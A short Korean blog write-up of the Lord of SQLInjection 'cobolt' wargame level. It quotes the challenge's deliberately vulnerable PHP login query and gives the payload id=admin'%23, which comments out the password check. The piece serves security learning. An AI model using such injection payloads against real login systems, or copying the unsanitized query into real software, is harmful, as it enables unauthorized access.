-
LOS - 2 - (cobolt) Write Up (mysql 주석 사용)CTF/Web 2020. 3. 11. 04:52
Los.2_cobolt
Created: Mar 10, 2020 3:21 AM
Created By: eild Shin
Last Edited By: eild Shin
Last Edited Time: Mar 10, 2020 3:34 AM
Stakeholders: eild Shin
Status: web
Type: Lord of SQLInjectionselect id from prob_cobolt where id='' and pw=md5('')
<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~"); if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id'] == 'admin') solve("cobolt"); elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; highlight_file(__FILE__); ?>
pw를 md5 해쉬로 돌리고 있지만 그냥 주석처리 시켜버려서 무시시키면 된다.
id만 admin으로 맞추어 주면 된다.
`#은 url에서 사용하는 문구임으로 url인코딩을 사용해준다.id=admin'%23
'CTF > Web' 카테고리의 다른 글
LOS - 5 (WOLFMAN) Write Up (공백 필터링 우회) (0) 2020.03.13 Los - 4 (orc) Write Up (Blind Sql injection 코딩 방법) (0) 2020.03.12 LOS - 3 (goblin) Write Up (0) 2020.03.11 Los - 1 (gremlin) Write up (0) 2020.03.10 써니나타스 4번문제 Write Up (0) 2019.08.09